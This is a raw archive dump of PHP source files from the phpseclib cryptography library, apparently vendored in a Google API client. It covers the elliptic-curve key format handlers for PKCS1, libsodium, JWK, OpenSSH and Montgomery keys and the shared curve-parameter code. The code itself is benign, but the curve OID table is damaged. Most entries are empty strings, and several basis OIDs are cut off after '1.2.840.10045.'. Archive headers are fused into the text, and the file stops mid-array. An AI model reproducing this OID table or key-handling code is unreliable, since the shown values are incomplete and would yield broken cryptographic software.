$components['QA'] = $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } /** * Convert an EC public key to the appropriate format * * @param \phpseclib3\Crypt\EC\BaseCurves\Montgomery $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return string */ public static function savePublicKey(MontgomeryCurve $curve, array $publicKey) { return strrev($publicKey[0]->toBytes()); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Crypt\EC\BaseCurves\Montgomery $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @return string */ public static function savePrivateKey(BigInteger $privateKey, MontgomeryCurve $curve, array $publicKey, $secret = null, $password = '') { if (!empty($password) && is_string($password)) { throw new UnsupportedFormatException('MontgomeryPrivate private keys do not support encryption'); } return $privateKey->toBytes(); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/PKCS1.php000064400000016234147600400120023227 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * "PKCS1" (RFC5915) Formatted EC Key Handler * * @author Jim Wigginton */ abstract class PKCS1 extends Progenitor { use Common; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { self::initialize_static_variables(); if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } if (strpos($key, 'BEGIN EC PARAMETERS') && strpos($key, 'BEGIN EC PRIVATE KEY')) { $components = []; preg_match('#-*BEGIN EC PRIVATE KEY-*[^-]*-*END EC PRIVATE KEY-*#s', $key, $matches); $decoded = parent::load($matches[0], $password); $decoded = ASN1::decodeBER($decoded); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $ecPrivate = ASN1::asn1map($decoded[0], Maps\ECPrivateKey::MAP); if (!is_array($ecPrivate)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (isset($ecPrivate['parameters'])) { $components['curve'] = self::loadCurveByParam($ecPrivate['parameters']); } preg_match('#-*BEGIN EC PARAMETERS-*[^-]*-*END EC PARAMETERS-*#s', $key, $matches); $decoded = parent::load($matches[0], ''); $decoded = ASN1::decodeBER($decoded); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $ecParams = ASN1::asn1map($decoded[0], Maps\ECParameters::MAP); if (!is_array($ecParams)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } $ecParams = self::loadCurveByParam($ecParams); // comparing $ecParams and $components['curve'] directly won't work because they'll have different Math\Common\FiniteField classes // even if the modulo is the same if (isset($components['curve']) && self::encodeParameters($ecParams, false, []) != self::encodeParameters($components['curve'], false, [])) { throw new \RuntimeException('EC PARAMETERS does not correspond to EC PRIVATE KEY'); } if (!isset($components['curve'])) { $components['curve'] = $ecParams; } $components['dA'] = new BigInteger($ecPrivate['privateKey'], 256); $components['curve']->rangeCheck($components['dA']); $components['QA'] = isset($ecPrivate['publicKey']) ? self::extractPoint($ecPrivate['publicKey'], $components['curve']) : $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } $key = parent::load($key, $password); $decoded = ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = ASN1::asn1map($decoded[0], Maps\ECParameters::MAP); if (is_array($key)) { return ['curve' => self::loadCurveByParam($key)]; } $key = ASN1::asn1map($decoded[0], Maps\ECPrivateKey::MAP); if (!is_array($key)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (!isset($key['parameters'])) { throw new \RuntimeException('Key cannot be loaded without parameters'); } $components = []; $components['curve'] = self::loadCurveByParam($key['parameters']); $components['dA'] = new BigInteger($key['privateKey'], 256); $components['QA'] = isset($ecPrivate['publicKey']) ? self::extractPoint($ecPrivate['publicKey'], $components['curve']) : $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } /** * Convert EC parameters to the appropriate format * * @return string */ public static function saveParameters(BaseCurve $curve, array $options = []) { self::initialize_static_variables(); if ($curve instanceof TwistedEdwardsCurve || $curve instanceof MontgomeryCurve) { throw new UnsupportedCurveException('TwistedEdwards and Montgomery Curves are not supported'); } $key = self::encodeParameters($curve, false, $options); return "-----BEGIN EC PARAMETERS-----\r\n" . chunk_split(Strings::base64_encode($key), 64) . "-----END EC PARAMETERS-----\r\n"; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $privateKey, BaseCurve $curve, array $publicKey, $secret = null, $password = '', array $options = []) { self::initialize_static_variables(); if ($curve instanceof TwistedEdwardsCurve || $curve instanceof MontgomeryCurve) { throw new UnsupportedCurveException('TwistedEdwards Curves are not supported'); } $publicKey = "\4" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $key = [ 'version' => 'ecPrivkeyVer1', 'privateKey' => $privateKey->toBytes(), 'parameters' => new ASN1\Element(self::encodeParameters($curve)), 'publicKey' => "\0" . $publicKey ]; $key = ASN1::encodeDER($key, Maps\ECPrivateKey::MAP); return self::wrapPrivateKey($key, 'EC', $password, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/libsodium.php000064400000007113147600400120024371 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Crypt\EC\Curves\Ed25519; use phpseclib3\Exception\UnsupportedFormatException; use phpseclib3\Math\BigInteger; /** * libsodium Key Handler * * @author Jim Wigginton */ abstract class libsodium { use Common; /** * Is invisible flag * */ const IS_INVISIBLE = true; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { switch (strlen($key)) { case 32: $public = $key; break; case 64: $private = substr($key, 0, 32); $public = substr($key, -32); break; case 96: $public = substr($key, -32); if (substr($key, 32, 32) != $public) { throw new \RuntimeException('Keys with 96 bytes should have the 2nd and 3rd set of 32 bytes match'); } $private = substr($key, 0, 32); break; default: throw new \RuntimeException('libsodium keys need to either be 32 bytes long, 64 bytes long or 96 bytes long'); } $curve = new Ed25519(); $components = ['curve' => $curve]; if (isset($private)) { $arr = $curve->extractSecret($private); $components['dA'] = $arr['dA']; $components['secret'] = $arr['secret']; } $components['QA'] = isset($public) ? self::extractPoint($public, $curve) : $curve->multiplyPoint($curve->getBasePoint(), $components['dA']); return $components; } /** * Convert an EC public key to the appropriate format * * @param \phpseclib3\Crypt\EC\Curves\Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return string */ public static function savePublicKey(Ed25519 $curve, array $publicKey) { return $curve->encodePoint($publicKey); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Crypt\EC\Curves\Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @return string */ public static function savePrivateKey(BigInteger $privateKey, Ed25519 $curve, array $publicKey, $secret = null, $password = '') { if (!isset($secret)) { throw new \RuntimeException('Private Key does not have a secret set'); } if (strlen($secret) != 32) { throw new \RuntimeException('Private Key secret is not of the correct length'); } if (!empty($password) && is_string($password)) { throw new UnsupportedFormatException('libsodium private keys do not support encryption'); } return $secret . $curve->encodePoint($publicKey); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/Common.php000064400000055704147600400120023643 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use phpseclib3\Crypt\EC\BaseCurves\Binary as BinaryCurve; use phpseclib3\Crypt\EC\BaseCurves\Prime as PrimeCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * Generic EC Key Parsing Helper functions * * @author Jim Wigginton */ trait Common { /** * Curve OIDs * * @var array */ private static $curveOIDs = []; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = false; /** * Use Named Curves * * @var bool */ private static $useNamedCurves = true; /** * Initialize static variables */ private static function initialize_static_variables() { if (empty(self::$curveOIDs)) { // the sec* curves are from the standards for efficient cryptography group // sect* curves are curves over binary finite fields // secp* curves are curves over prime finite fields // sec*r* curves are regular curves; sec*k* curves are koblitz curves // brainpool*r* curves are regular prime finite field curves // brainpool*t* curves are twisted versions of the brainpool*r* curves self::$curveOIDs = [ 'prime192v1' => '1.2.840.10045.3.1.1', // J.5.1, example 1 (aka secp192r1) 'prime192v2' => '1.2.840.10045.3.1.2', // J.5.1, example 2 'prime192v3' => '1.2.840.10045.3.1.3', // J.5.1, example 3 'prime239v1' => '1.2.840.10045.3.1.4', // J.5.2, example 1 'prime239v2' => '1.2.840.10045.3.1.5', // J.5.2, example 2 'prime239v3' => '1.2.840.10045.3.1.6', // J.5.2, example 3 'prime256v1' => '1.2.840.10045.3.1.7', // J.5.3, example 1 (aka secp256r1) // https://tools.ietf.org/html/rfc5656#section-10 'nistp256' => '1.2.840.10045.3.1.7', // aka secp256r1 'nistp384' => '', // aka secp384r1 'nistp521' => '', // aka secp521r1 'nistk163' => '', // aka sect163k1 'nistp192' => '1.2.840.10045.3.1.1', // aka secp192r1 'nistp224' => '', // aka secp224r1 'nistk233' => '', // aka sect233k1 'nistb233' => '', // aka sect233r1 'nistk283' => '', // aka sect283k1 'nistk409' => '', // aka sect409k1 'nistb409' => '', // aka sect409r1 'nistt571' => '', // aka sect571k1 // from https://tools.ietf.org/html/rfc5915 'secp192r1' => '1.2.840.10045.3.1.1', // aka prime192v1 'sect163k1' => '', 'sect163r2' => '', 'secp224r1' => '', 'sect233k1' => '', 'sect233r1' => '', 'secp256r1' => '1.2.840.10045.3.1.7', // aka prime256v1 'sect283k1' => '', 'sect283r1' => '', 'secp384r1' => '', 'sect409k1' => '', 'sect409r1' => '', 'secp521r1' => '', 'sect571k1' => '', 'sect571r1' => '', // from http://www.secg.org/SEC2-Ver-1.0.pdf 'secp112r1' => '', 'secp112r2' => '', 'secp128r1' => '', 'secp128r2' => '', 'secp160k1' => '', 'secp160r1' => '', 'secp160r2' => '', 'secp192k1' => '', 'secp224k1' => '', 'secp256k1' => '', 'sect113r1' => '', 'sect113r2' => '', 'sect131r1' => '', 'sect131r2' => '', 'sect163r1' => '', 'sect193r1' => '', 'sect193r2' => '', 'sect239k1' => '', // from http://citeseerx.ist.psu.edu/viewdoc/download?doi= /* 'c2pnb163v1' => '1.2.840.10045.3.0.1', // J.4.1, example 1 'c2pnb163v2' => '1.2.840.10045.3.0.2', // J.4.1, example 2 'c2pnb163v3' => '1.2.840.10045.3.0.3', // J.4.1, example 3 'c2pnb172w1' => '1.2.840.10045.3.0.4', // J.4.2, example 1 'c2tnb191v1' => '1.2.840.10045.3.0.5', // J.4.3, example 1 'c2tnb191v2' => '1.2.840.10045.3.0.6', // J.4.3, example 2 'c2tnb191v3' => '1.2.840.10045.3.0.7', // J.4.3, example 3 'c2onb191v4' => '1.2.840.10045.3.0.8', // J.4.3, example 4 'c2onb191v5' => '1.2.840.10045.3.0.9', // J.4.3, example 5 'c2pnb208w1' => '1.2.840.10045.3.0.10', // J.4.4, example 1 'c2tnb239v1' => '1.2.840.10045.3.0.11', // J.4.5, example 1 'c2tnb239v2' => '1.2.840.10045.3.0.12', // J.4.5, example 2 'c2tnb239v3' => '1.2.840.10045.3.0.13', // J.4.5, example 3 'c2onb239v4' => '1.2.840.10045.3.0.14', // J.4.5, example 4 'c2onb239v5' => '1.2.840.10045.3.0.15', // J.4.5, example 5 'c2pnb272w1' => '1.2.840.10045.3.0.16', // J.4.6, example 1 'c2pnb304w1' => '1.2.840.10045.3.0.17', // J.4.7, example 1 'c2tnb359v1' => '1.2.840.10045.3.0.18', // J.4.8, example 1 'c2pnb368w1' => '1.2.840.10045.3.0.19', // J.4.9, example 1 'c2tnb431r1' => '1.2.840.10045.3.0.20', // J.4.10, example 1 */ // http://www.ecc-brainpool.org/download/Domain-parameters.pdf // https://tools.ietf.org/html/rfc5639 'brainpoolP160r1' => '', 'brainpoolP160t1' => '', 'brainpoolP192r1' => '', 'brainpoolP192t1' => '', 'brainpoolP224r1' => '', 'brainpoolP224t1' => '', 'brainpoolP256r1' => '', 'brainpoolP256t1' => '', 'brainpoolP320r1' => '', 'brainpoolP320t1' => '', 'brainpoolP384r1' => '', 'brainpoolP384t1' => '', 'brainpoolP512r1' => '', 'brainpoolP512t1' => '' ]; ASN1::loadOIDs([ 'prime-field' => '1.2.840.10045.1.1', 'characteristic-two-field' => '1.2.840.10045.1.2', 'characteristic-two-basis' => '1.2.840.10045.1.2.3', // per http://www.secg.org/SEC1-Ver-1.0.pdf#page=84, gnBasis "not used here" 'gnBasis' => '1.2.840.10045.', // NULL 'tpBasis' => '1.2.840.10045.', // Trinomial 'ppBasis' => '1.2.840.10045.' // Pentanomial ] + self::$curveOIDs); } } /** * Explicitly set the curve * * If the key contains an implicit curve phpseclib needs the curve * to be explicitly provided * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve */ public static function setImplicitCurve(BaseCurve $curve) { self::$implicitCurve = $curve; } /** * Returns an instance of \phpseclib3\Crypt\EC\BaseCurves\Base based * on the curve parameters * * @param array $params * @return \phpseclib3\Crypt\EC\BaseCurves\Base|false */ protected static function loadCurveByParam(array $params) { if (count($params) > 1) { throw new \RuntimeException('No parameters are present'); } if (isset($params['namedCurve'])) { $curve = '\phpseclib3\Crypt\EC\Curves\\' . $params['namedCurve']; if (!class_exists($curve)) { throw new UnsupportedCurveException('Named Curve of ' . $params['namedCurve'] . ' is not supported'); } return new $curve(); } if (isset($params['implicitCurve'])) { if (!isset(self::$implicitCurve)) { throw new \RuntimeException('Implicit curves can be provided by calling setImplicitCurve'); } return self::$implicitCurve; } if (isset($params['specifiedCurve'])) { $data = $params['specifiedCurve']; switch ($data['fieldID']['fieldType']) { case 'prime-field': $curve = new PrimeCurve(); $curve->setModulo($data['fieldID']['parameters']); $curve->setCoefficients( new BigInteger($data['curve']['a'], 256), new BigInteger($data['curve']['b'], 256) ); $point = self::extractPoint("\0" . $data['base'], $curve); $curve->setBasePoint(...$point); $curve->setOrder($data['order']); return $curve; case 'characteristic-two-field': $curve = new BinaryCurve(); $params = ASN1::decodeBER($data['fieldID']['parameters']); $params = ASN1::asn1map($params[0], Maps\Characteristic_two::MAP); $modulo = [(int) $params['m']->toString()]; switch ($params['basis']) { case 'tpBasis': $modulo[] = (int) $params['parameters']->toString(); break; case 'ppBasis': $temp = ASN1::decodeBER($params['parameters']); $temp = ASN1::asn1map($temp[0], Maps\Pentanomial::MAP); $modulo[] = (int) $temp['k3']->toString(); $modulo[] = (int) $temp['k2']->toString(); $modulo[] = (int) $temp['k1']->toString(); } $modulo[] = 0; $curve->setModulo(...$modulo); $len = ceil($modulo[0] / 8); $curve->setCoefficients( Strings::bin2hex($data['curve']['a']), Strings::bin2hex($data['curve']['b']) ); $point = self::extractPoint("\0" . $data['base'], $curve); $curve->setBasePoint(...$point); $curve->setOrder($data['order']); return $curve; default: throw new UnsupportedCurveException('Field Type of ' . $data['fieldID']['fieldType'] . ' is not supported'); } } throw new \RuntimeException('No valid parameters are present'); } /** * Extract points from a string * * Supports both compressed and uncompressed points * * @param string $str * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @return object[] */ public static function extractPoint($str, BaseCurve $curve) { if ($curve instanceof TwistedEdwardsCurve) { // first step of point deciding as discussed at the following URL's: // https://tools.ietf.org/html/rfc8032#section-5.1.3 // https://tools.ietf.org/html/rfc8032#section-5.2.3 $y = $str; $y = strrev($y); $sign = (bool) (ord($y[0]) & 0x80); $y[0] = $y[0] & chr(0x7F); $y = new BigInteger($y, 256); if ($y->compare($curve->getModulo()) >= 0) { throw new \RuntimeException('The Y coordinate should not be >= the modulo'); } $point = $curve->recoverX($y, $sign); if (!$curve->verifyPoint($point)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } return $point; } // the first byte of a bit string represents the number of bits in the last byte that are to be ignored but, // currently, bit strings wanting a non-zero amount of bits trimmed are not supported if (($val = Strings::shift($str)) != "\0") { throw new \UnexpectedValueException('extractPoint expects the first byte to be null - not ' . Strings::bin2hex($val)); } if ($str == "\0") { return []; } $keylen = strlen($str); $order = $curve->getLengthInBytes(); // point compression is being used if ($keylen == $order + 1) { return $curve->derivePoint($str); } // point compression is not being used if ($keylen == 2 * $order + 1) { preg_match("#(.)(.{{$order}})(.{{$order}})#s", $str, $matches); list(, $w, $x, $y) = $matches; if ($w != "\4") { throw new \UnexpectedValueException('The first byte of an uncompressed point should be 04 - not ' . Strings::bin2hex($val)); } $point = [ $curve->convertInteger(new BigInteger($x, 256)), $curve->convertInteger(new BigInteger($y, 256)) ]; if (!$curve->verifyPoint($point)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } return $point; } throw new \UnexpectedValueException('The string representation of the points is not of an appropriate length'); } /** * Encode Parameters * * @todo Maybe at some point this could be moved to __toString() for each of the curves? * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param bool $returnArray optional * @param array $options optional * @return string|false */ private static function encodeParameters(BaseCurve $curve, $returnArray = false, array $options = []) { $useNamedCurves = isset($options['namedCurve']) ? $options['namedCurve'] : self::$useNamedCurves; $reflect = new \ReflectionClass($curve); $name = $reflect->getShortName(); if ($useNamedCurves) { if (isset(self::$curveOIDs[$name])) { if ($reflect->isFinal()) { $reflect = $reflect->getParentClass(); $name = $reflect->getShortName(); } return $returnArray ? ['namedCurve' => $name] : ASN1::encodeDER(['namedCurve' => $name], Maps\ECParameters::MAP); } foreach (new \DirectoryIterator(__DIR__ . '/../../Curves/') as $file) { if ($file->getExtension() != 'php') { continue; } $testName = $file->getBasename('.php'); $class = 'phpseclib3\Crypt\EC\Curves\\' . $testName; $reflect = new \ReflectionClass($class); if ($reflect->isFinal()) { continue; } $candidate = new $class(); switch ($name) { case 'Prime': if (!$candidate instanceof PrimeCurve) { break; } if (!$candidate->getModulo()->equals($curve->getModulo())) { break; } if ($candidate->getA()->toBytes() != $curve->getA()->toBytes()) { break; } if ($candidate->getB()->toBytes() != $curve->getB()->toBytes()) { break; } list($candidateX, $candidateY) = $candidate->getBasePoint(); list($curveX, $curveY) = $curve->getBasePoint(); if ($candidateX->toBytes() != $curveX->toBytes()) { break; } if ($candidateY->toBytes() != $curveY->toBytes()) { break; } return $returnArray ? ['namedCurve' => $testName] : ASN1::encodeDER(['namedCurve' => $testName], Maps\ECParameters::MAP); case 'Binary': if (!$candidate instanceof BinaryCurve) { break; } if ($candidate->getModulo() != $curve->getModulo()) { break; } if ($candidate->getA()->toBytes() != $curve->getA()->toBytes()) { break; } if ($candidate->getB()->toBytes() != $curve->getB()->toBytes()) { break; } list($candidateX, $candidateY) = $candidate->getBasePoint(); list($curveX, $curveY) = $curve->getBasePoint(); if ($candidateX->toBytes() != $curveX->toBytes()) { break; } if ($candidateY->toBytes() != $curveY->toBytes()) { break; } return $returnArray ? ['namedCurve' => $testName] : ASN1::encodeDER(['namedCurve' => $testName], Maps\ECParameters::MAP); } } } $order = $curve->getOrder(); // we could try to calculate the order thusly: // https://crypto.stackexchange.com/a/27914/4520 // https://en.wikipedia.org/wiki/Schoof%E2%80%93Elkies%E2%80%93Atkin_algorithm if (!$order) { throw new \RuntimeException('Specified Curves need the order to be specified'); } $point = $curve->getBasePoint(); $x = $point[0]->toBytes(); $y = $point[1]->toBytes(); if ($curve instanceof PrimeCurve) { /* * valid versions are: * * ecdpVer1: * - neither the curve or the base point are generated verifiably randomly. * ecdpVer2: * - curve and base point are generated verifiably at random and curve.seed is present * ecdpVer3: * - base point is generated verifiably at random but curve is not. curve.seed is present */ // other (optional) parameters can be calculated using the methods discused at // https://crypto.stackexchange.com/q/28947/4520 $data = [ 'version' => 'ecdpVer1', 'fieldID' => [ 'fieldType' => 'prime-field', 'parameters' => $curve->getModulo() ], 'curve' => [ 'a' => $curve->getA()->toBytes(), 'b' => $curve->getB()->toBytes() ], 'base' => "\4" . $x . $y, 'order' => $order ]; return $returnArray ? ['specifiedCurve' => $data] : ASN1::encodeDER(['specifiedCurve' => $data], Maps\ECParameters::MAP); } if ($curve instanceof BinaryCurve) { $modulo = $curve->getModulo(); $basis = count($modulo); $m = array_shift($modulo); array_pop($modulo); // the last parameter should always be 0 //rsort($modulo); switch ($basis) { case 3: $basis = 'tpBasis'; $modulo = new BigInteger($modulo[0]); break; case 5: $basis = 'ppBasis'; // these should be in strictly ascending order (hence the commented out rsort above) $modulo = [ 'k1' => new BigInteger($modulo[2]), 'k2' => new BigInteger($modulo[1]), 'k3' => new BigInteger($modulo[0]) ]; $modulo = ASN1::encodeDER($modulo, Maps\Pentanomial::MAP); $modulo = new ASN1\Element($modulo); } $params = ASN1::encodeDER([ 'm' => new BigInteger($m), 'basis' => $basis, 'parameters' => $modulo ], Maps\Characteristic_two::MAP); $params = new ASN1\Element($params); $a = ltrim($curve->getA()->toBytes(), "\0"); if (!strlen($a)) { $a = "\0"; } $b = ltrim($curve->getB()->toBytes(), "\0"); if (!strlen($b)) { $b = "\0"; } $data = [ 'version' => 'ecdpVer1', 'fieldID' => [ 'fieldType' => 'characteristic-two-field', 'parameters' => $params ], 'curve' => [ 'a' => $a, 'b' => $b ], 'base' => "\4" . $x . $y, 'order' => $order ]; return $returnArray ? ['specifiedCurve' => $data] : ASN1::encodeDER(['specifiedCurve' => $data], Maps\ECParameters::MAP); } throw new UnsupportedCurveException('Curve cannot be serialized'); } /** * Use Specified Curve * * A specified curve has all the coefficients, the base points, etc, explicitely included. * A specified curve is a more verbose way of representing a curve */ public static function useSpecifiedCurve() { self::$useNamedCurves = false; } /** * Use Named Curve * * A named curve does not include any parameters. It is up to the EC parameters to * know what the coefficients, the base points, etc, are from the name of the curve. * A named curve is a more concise way of representing a curve */ public static function useNamedCurve() { self::$useNamedCurves = true; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/JWK.php000064400000014263147600400120023041 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\JWK as Progenitor; use phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Crypt\EC\Curves\Ed25519; use phpseclib3\Crypt\EC\Curves\secp256k1; use phpseclib3\Crypt\EC\Curves\secp256r1; use phpseclib3\Crypt\EC\Curves\secp384r1; use phpseclib3\Crypt\EC\Curves\secp521r1; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\Math\BigInteger; /** * JWK Formatted EC Handler * * @author Jim Wigginton */ abstract class JWK extends Progenitor { use Common; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); switch ($key->kty) { case 'EC': switch ($key->crv) { case 'P-256': case 'P-384': case 'P-521': case 'secp256k1': break; default: throw new UnsupportedCurveException('Only P-256, P-384, P-521 and secp256k1 curves are accepted (' . $key->crv . ' provided)'); } break; case 'OKP': switch ($key->crv) { case 'Ed25519': case 'Ed448': break; default: throw new UnsupportedCurveException('Only Ed25519 and Ed448 curves are accepted (' . $key->crv . ' provided)'); } break; default: throw new \Exception('Only EC and OKP JWK keys are supported'); } $curve = '\phpseclib3\Crypt\EC\Curves\\' . str_replace('P-', 'nistp', $key->crv); $curve = new $curve(); if ($curve instanceof TwistedEdwardsCurve) { $QA = self::extractPoint(Strings::base64url_decode($key->x), $curve); if (!isset($key->d)) { return compact('curve', 'QA'); } $arr = $curve->extractSecret(Strings::base64url_decode($key->d)); return compact('curve', 'QA') + $arr; } $QA = [ $curve->convertInteger(new BigInteger(Strings::base64url_decode($key->x), 256)), $curve->convertInteger(new BigInteger(Strings::base64url_decode($key->y), 256)) ]; if (!$curve->verifyPoint($QA)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } if (!isset($key->d)) { return compact('curve', 'QA'); } $dA = new BigInteger(Strings::base64url_decode($key->d), 256); $curve->rangeCheck($dA); return compact('curve', 'dA', 'QA'); } /** * Returns the alias that corresponds to a curve * * @return string */ private static function getAlias(BaseCurve $curve) { switch (true) { case $curve instanceof secp256r1: return 'P-256'; case $curve instanceof secp384r1: return 'P-384'; case $curve instanceof secp521r1: return 'P-521'; case $curve instanceof secp256k1: return 'secp256k1'; } $reflect = new \ReflectionClass($curve); $curveName = $reflect->isFinal() ? $reflect->getParentClass()->getShortName() : $reflect->getShortName(); throw new UnsupportedCurveException("$curveName is not a supported curve"); } /** * Return the array superstructure for an EC public key * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return array */ private static function savePublicKeyHelper(BaseCurve $curve, array $publicKey) { if ($curve instanceof TwistedEdwardsCurve) { return [ 'kty' => 'OKP', 'crv' => $curve instanceof Ed25519 ? 'Ed25519' : 'Ed448', 'x' => Strings::base64url_encode($curve->encodePoint($publicKey)) ]; } return [ 'kty' => 'EC', 'crv' => self::getAlias($curve), 'x' => Strings::base64url_encode($publicKey[0]->toBytes()), 'y' => Strings::base64url_encode($publicKey[1]->toBytes()) ]; } /** * Convert an EC public key to the appropriate format * * @param \phpseclib3\Crypt\EC\BaseCurves\Base $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(BaseCurve $curve, array $publicKey, array $options = []) { $key = self::savePublicKeyHelper($curve, $publicKey); return self::wrapKey($key, $options); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Crypt\EC\Curves\Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $privateKey, BaseCurve $curve, array $publicKey, $secret = null, $password = '', array $options = []) { $key = self::savePublicKeyHelper($curve, $publicKey); $key['d'] = $curve instanceof TwistedEdwardsCurve ? $secret : $privateKey->toBytes(); $key['d'] = Strings::base64url_encode($key['d']); return self::wrapKey($key, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/MontgomeryPublic.php000064400000003467147600400120025711 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\Curves\Curve25519; use phpseclib3\Crypt\EC\Curves\Curve448; use phpseclib3\Math\BigInteger; /** * Montgomery Public Key Handler * * @author Jim Wigginton */ abstract class MontgomeryPublic { /** * Is invisible flag * */ const IS_INVISIBLE = true; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { switch (strlen($key)) { case 32: $curve = new Curve25519(); break; case 56: $curve = new Curve448(); break; default: throw new \LengthException('The only supported lengths are 32 and 56'); } $components = ['curve' => $curve]; $components['QA'] = [$components['curve']->convertInteger(new BigInteger(strrev($key), 256))]; return $components; } /** * Convert an EC public key to the appropriate format * * @param \phpseclib3\Crypt\EC\BaseCurves\Montgomery $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @return string */ public static function savePublicKey(MontgomeryCurve $curve, array $publicKey) { return strrev($publicKey[0]->toBytes()); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Formats/Keys/OpenSSH.php000064400000015355147600400120023670 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\OpenSSH as Progenitor; use phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use phpseclib3\Crypt\EC\Curves\Ed25519; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\Math\BigInteger; /** * OpenSSH Formatted EC Key Handler * * @author Jim Wigginton */ abstract class OpenSSH extends Progenitor { use Common; /** * Supported Key Types * * @var array */ protected static $types = [ 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', 